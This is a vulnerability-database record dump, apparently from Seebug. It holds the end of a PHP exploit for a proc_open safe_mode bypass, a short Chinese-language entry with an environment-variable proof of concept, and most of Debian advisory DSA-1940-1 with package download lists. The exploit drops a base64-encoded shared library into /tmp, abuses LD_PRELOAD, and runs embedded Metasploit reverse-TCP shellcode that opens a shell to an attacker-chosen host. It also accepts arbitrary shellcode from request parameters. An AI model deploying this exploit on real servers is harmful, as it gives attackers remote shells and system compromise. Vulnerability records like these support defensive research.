gfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA\r\nAAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA\r\nAAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA\r\nEADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA\r\nAAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf\r\nR0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0\r\nX3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf\r\nUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w\r\nAF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x\r\nLjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==&quot; ;\r\n}\r\n \r\nif (!function_exists('file_put_contents')){\r\n function file_put_contents($filename, $data){\r\n $f = @fopen($filename, 'w');\r\n if (!$f){\r\n return false;\r\n }\r\n else{\r\n $bytes = fwrite($f, $data);\r\n fclose($f);\r\n return $bytes;\r\n }\r\n }\r\n}\r\n \r\n// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\nfile_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));\r\n$ip = gethostbyname($host);\r\n \r\n$port1 = sprintf('%c', ($port&gt;&gt; 8)&amp;255 );\r\n$port2 = sprintf('%c', ($port&gt;&gt; 0)&amp;255 );\r\n \r\n$part = explode('.', $ip);\r\n//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);\r\n$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);\r\n \r\n/*\r\n * linux/x86/shell_reverse_tcp - 71 bytes\r\n * http://www.metasploit.com\r\n * Encoder: generic/none\r\n * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,\r\n * PrependSetresuid=false, PrependSetreuid=false,\r\n * PrependSetuid=false, PrependChrootBreak=false,\r\n * AppendExit=false\r\n */\r\n \r\n \r\n$Xshellcode =\r\n&quot;\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80&quot;.\r\n&quot;\\x5b\\x5e\\x68&quot;.$STRINGIP.&quot;\\x66\\x68&quot;.$port1.$port2.&quot;\\x66\\x53\\x6a\\x10&quot;.\r\n&quot;\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f&quot;.\r\n&quot;\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69&quot;.\r\n&quot;\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x00&quot; ;\r\n \r\nif(isset($_REQUEST['shellcode'])){\r\n// just for fans of metasploit\r\n$Xshellcode=base64_decode($_REQUEST['shellcode']);\r\n}\r\n \r\nfile_put_contents(&quot;/tmp/.X11-IHSTEAM&quot;, $Xshellcode);\r\n \r\n$cwd = '/tmp/';\r\n$env = array('LD_PRELOAD' =&gt; '/tmp/shellcode.so');\r\nunset($var);\r\n \r\n$descriptorspec = array(0 =&gt; array(&quot;pipe&quot;, &quot;r&quot;), 1 =&gt; array(&quot;pipe&quot;, &quot;w&quot;));\r\n \r\n// BOOM\r\nproc_open('IHSteam', $descriptorspec, $var, $cwd, $env);\r\nmail(&quot;IHSteam&quot;,&quot;IHSteam&quot;,&quot;IHSteam&quot;,&quot;IHSteam&quot;);\r\n?&gt;\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19231"}, {"lastseen": "2017-11-19T18:28:18", "description": "BUGTRAQ ID: 37138\r\nCVE ID: CVE-2009-4018\r\n\r\nPHP\u662f\u5e7f\u6cdb\u4f7f\u7528\u7684\u901a\u7528\u76ee\u7684\u811a\u672c\u8bed\u8a00\uff0c\u7279\u522b\u9002\u5408\u4e8eWeb\u5f00\u53d1\uff0c\u53ef\u5d4c\u5165\u5230HTML\u4e2d\u3002 \r\n\r\nPHP\u6ca1\u6709\u6267\u884c\u4efb\u4f55\u68c0\u67e5\u4fbf\u5141\u8bb8\u4f20\u9001\u5bf9proc_open\u6240\u6307\u5b9a\u7684\u73af\u5883\u53d8\u91cf\uff0c\u8fd9\u5c31\u5ffd\u7565\u4e86safe_mode_allowed_env_vars\u548csafe_mode_protected_env_vars\u8bbe\u7f6e\u3002\u7528\u6237\u53ef\u4ee5\u7ed5\u8fc7safe_mode\u9650\u5236\u8bbf\u95eeApache UID\u53ef\u8bbf\u95ee\u7684\u4efb\u610f\u6587\u4ef6\u3002\n\nPHP 5.3.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://svn.php.net/viewvc/?view=revision&amp;revision=286360", "published": "2009-11-30T00:00:00", "type": "seebug", "title": "PHP proc_open()\u7ed5\u8fc7safe_mode_protected_env_var\u9650\u5236\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2009-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14994", "id": "SSV:14994", "sourceData": "\n &lt;?\r\nputenv(&quot;BLAHBLAH=123&quot;);\r\nputenv(&quot;LD_LIBRARY_PATH=/no/way&quot;);\r\nputenv(&quot;PHP_TESTVAR=allowed&quot;);\r\n$env = array('BLAHBLAH' =&gt; '123', 'LD_LIBRARY_PATH' =&gt; '/no/way',\r\n'PHP_TESTVAR' =&gt; 'allowed');\r\n$dptspec = array(0 =&gt; array(&quot;pipe&quot;, &quot;r&quot;),\r\n 1 =&gt; array(&quot;pipe&quot;, &quot;w&quot;));\r\n$fp = proc_open('env', $dptspec, $pipes, './', $env);\r\necho &quot;&lt;pre&gt;&quot;;\r\nwhile(!feof($pipes[1])) echo fgets($pipes[1], 1024);\r\nfclose($pipes[1]);\r\necho &quot;&lt;/pre&gt;&quot;;\r\n?&gt;\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14994", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:12:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2687", "CVE-2009-3292", "CVE-2008-5658", "CVE-2009-3291", "CVE-2009-2626"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1940-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nNovember 25, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : multiple issues\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-2626 CVE-2009-2687 CVE-2009-3291 CVE-2009-3292\nDebian bugs : 535888 540605 527560 \n\nSeveral remote vulnerabilities have been discovered in the PHP 5\nhypertext preprocessor. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nThe following issues have been fixed in both the stable (lenny)\nand the oldstable (etch) distributions:\n \nCVE-2009-2687 CVE-2009-3292\n\n The exif module did not properly handle malformed jpeg files,\n allowing an attacker to cause a segfault, resulting in a denial\n of service.\n \n\nCVE-2009-3291\n\n The php_openssl_apply_verification_policy() function did not\n properly perform certificate validation.\n\n\nNo CVE id yet\n\n Bogdan Calin discovered that a remote attacker could cause a denial\n of service by uploading a large number of files in using multipart/\n form-data requests, causing the creation of a large number of\n temporary files.\n\n To address this issue, the max_file_uploads option introduced in PHP\n 5.3.1 has been backported. This option limits the maximum number of\n files uploaded per request. The default value for this new option is\n 50. See NEWS.Debian for more information.\n\n\nThe following issue has been fixed in the stable (lenny) distribution:\n \nCVE-2009-2626\n\n A flaw in the ini_restore() function could lead to a memory\n disclosure, possibly leading to the disclosure of sensitive data.\n\n\nIn the oldstable (etch) distribution, this update also fixes a regression\nintroduced by the fix for CVE-2008-5658 in DSA-1789-1 (bug #527560).\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.2.6.dfsg.1-1+lenny4.\n\nThe oldstable distribution (etch), these problems have been fixed in\nversion 5.2.0+dfsg-8+etch16.\n\nFor the testing distribution (squeeze) and the unstable distribution\n(sid), these problems will be fixed in version 5.2.11.dfsg.1-2.\n\nWe recommend that you upgrade your php5 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 (oldstable) alias etch\n- -------------------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg.orig.tar.gz\n Size/MD5 checksum: 8431973 956486a588c577616a5008d185e84968\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch16.dsc\n Size/MD5 checksum: 2002 7b5aa6deaeba26e4c5cf3bb6ae33c27b\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch16.diff.gz\n Size/MD5 checksum: 134709 612732624d30561ad7dea430903a2807\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch16_all.deb\n Size/MD5 checksum: 1044 64a93759ca8a44ce1499fb425af5ba7d\n http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.0+dfsg-8+etch16_all.deb\n Size/MD5 checksum: 310830 7919b140eee8f8f2e10fedd41fd14fd6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 5318 a07734d09bbc26ceb28ebcd9b1ffc1f1\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 24970 5d6004f15fe242fccd6c4a182025bcca\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 13476 1ec0f17e50e295fca526dfe06a362f92\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 18610 92848fda2bdb624c9f3a7056077867cc\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 2488466 96a5738358c120ddc413bc953d365623\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 40292 51458abe32e534379fa70daa94a1be66\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 9052 dd0be76eb4566fa6ee6a814e9b2396a5\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 38544 037e4dd443d68eb25435e4b245f5bae1\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 2412676 1ae4f6ba6f50e2c216876c485eeb108a\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 4948 4e19e8a2376c9a24f27cada6cdc9b0d1\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 4790194 0ba2321b5a2c43b08be044ee2c015228\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 36514 1c5ecae2bd1dd1c8d51739f686929d6f\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 70746 130c3501ffc77604dd8db9a4ce0d2197\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 17542 a8380c6c895c2fdbd0b53d5afe304da0\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 19594 24b726bd51ccf6298f252f632df66fae\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 36112 34b76e78b7242d2ac990aae3f53d92d0\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 55668 b95a6625bb267e790770191ef0dc3128\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 2487774 cefb2da57c7effcd314cf511f4e17db4\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 11840 a5b02752d2b7a771833d1520ad908d5b\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 13378 3d2e2b49489c07aac66e0164eac51f01\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 36656 f9f1d4bf23fd249b2cc9521824e7771a\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 221502 261df523100f0509f5a2c5475f1178a8\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_alpha.deb\n Size/MD5 checksum: 342192 e6519637a9221e3adc6b468de2c5bb98\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 2434276 771b474b437c79d99c618b26fe37947a\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 344546 d3bb651649ba842036cc8ac3659a78a5\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 36710 346f128adf65b8a11fa2d8a870ffafe6\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 36432 4dab2ccdcca8f327dd937bb1726baa09\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 24968 ee88dda46b28cc8fb95368df225d1cbd\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 17562 1367309ced589b7e431e208d08c05d4c\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 18648 1c4cdef714b95add864534d00e307b9e\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 13476 642f1853e66c40ba001d9259a0935a55\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 38442 3a4a23a7b9b44034ad431a1bc97c9b43\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 2434744 7df76c20d0638c48fb50ff9837fa2e39\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 37110 3ddb2d6f43bf48d9d39a65be726b0758\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 4898 97b59510d3c93098377f7ce3d035678f\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 71764 df871b2cc8536d86cb98b1deaba12175\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 46768 c2b07344538b5a844d2b9d71b2a0af0a\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 4718064 fe712913c6b77092a1232b12e6c253bb\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 12052 a1903f82b61820a26c9dda7539c67256\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 9396 93efa8754c0651aefdd5274a12d080e6\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 2380798 09a2b12cb5b45d0091155b3164814539\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 217832 3996c8de414790cbf69f63b58eb83f3e\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 39156 2b214fc86b2a97dcdbf3bca165eb8082\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 19420 f4c3bbdb831244db2bdd5335efd3edd5\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 13022 4b4c9d4850a1e333ee06890f74af6c7f\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 53950 16daf5e82a9290de8a47bd1322851c70\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_amd64.deb\n Size/MD5 checksum: 5254 b4ea03d4ee1403fd58ce7911e8014cc5\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 33664 dae843d051382e33477c546dc1b17fef\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 4860 b1fa710c79e35f07d8145f5225115a0e\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 24074 1ed613d17e45bdb307e1cc1ee9197140\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 8748 678e85d43e7c2b072086ebe7eda86a4a\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 63830 89fd8a16a38e5422288a255c24dc99b4\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 33754 6bc2e86523dd31e99146cfdff9342ebe\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 11876 c7744360e2fe35758726203f7d7939b3\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 33032 b9bc2d01341a65067db6ba85f6972657\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 218168 448c06872b6b8748d58446c87a625718\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 49458 9bbe16b2389be190bd62c3978e214242\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 33658 46890c77b5e44a2caa00103335b94b54\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 2310596 67a3f80e614d671e74beaf4efe0f308c\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 4634 a174a9be31b05476a3c691d8cd48d02b\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 15836 c1721c65f6f2efaff3b144dd75ac0cca\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 10922 bf0551cbe5780f47e1fb983b6640e8e7\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 33628 eac84953c3c683c11395fbc4672a69a4\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 17076 610841d9f054965028f32f345a371e73\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 2311228 b35fa9a592ce4253f3b48f52fd3a0596\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 17932 80af51b198bd6eee454ab5d276d82d87\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 2304412 bf37c5c338dd12f777b06ccd01661b79\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 4574286 84018b4aa03cd7ec37808837e00bf6f9\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 346624 4efb7f4b43cd76f9fee022e1784734e5\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_arm.deb\n Size/MD5 checksum: 12444 136e8b2d74a618ae25bbbfb2c0a4e4c1\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 2538134 395e4f23913f0473a61cdbf610463072\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 58144 809b3d3489bf894c0171a458729160af\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 346682 1fb4ff12b932f3c622a6b85d631ec137\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 15554 9c86477e663592c81e0e3946483985dd\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 5828 c863a1d79a314b4cf6482335c0bf4493\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 2636726 b6f9767e272499dbbab318d1e324bdc4\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 5500 e33306bada012281838cc47644e6e270\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 12566 bbfbab3fa98a9c01f56686e64fc6f61b\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 75424 a31a53821873d00f008e2aae00355800\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 42130 70efa89890134950479a8633c4c085bf\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 39990 5e53335257ae9d905fdfa8d4b5e276c0\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 28246 13fcc197f0e0bc6846abc3f8e02d9357\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 5036032 7081bd1e68c44a4fe89d2d5f1025dd2a\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 39546 8edb59eacb189a40f3bb52572cad42ff\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 14102 e38c4575055508f9768c3920d6772768\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 9752 a9a32b5958ef64d64e2c0a2b5b6df8b4\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 19590 9059b304df9bab6839a8e20d6071d706\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 224758 e72f41be256c4a9a088ab186782e69d3\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 38274 909e3a3e96acaef143477617539c102f\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 40966 f5a79ab2588446d4441e2310832bef25\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 21124 bbd739683199d65c24e60bcf28ffd15c\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 2636816 73c8b75aaacb6b6b04288d04a40320d5\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_hppa.deb\n Size/MD5 checksum: 20322 bbd9be70bfbbde086c94de1d48b721ff\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 24456 cf35fd3486528755a489d919f5282b67\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 50688 c998895656808d474defb1092f6dfb13\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 34084 dcbb9738d1c5a4a9acff1d70347a9c91\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 16466 7f385824b87318dcd35a23403a3a2500\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 34452 fe3c3515e024463f4e896873b79a4bc8\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 2339286 72b234c3640a6df2aad10c69a0f8dfe4\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 346104 3df62142ddcbcc49e15a19de9b879d63\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 11290 497cdb7245cff2b1066fde84179ff2fb\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_i386.deb\n Size/MD5 checksum: 4613124 8e8d3b7def6574fe720e79ef98ab6fb3\n 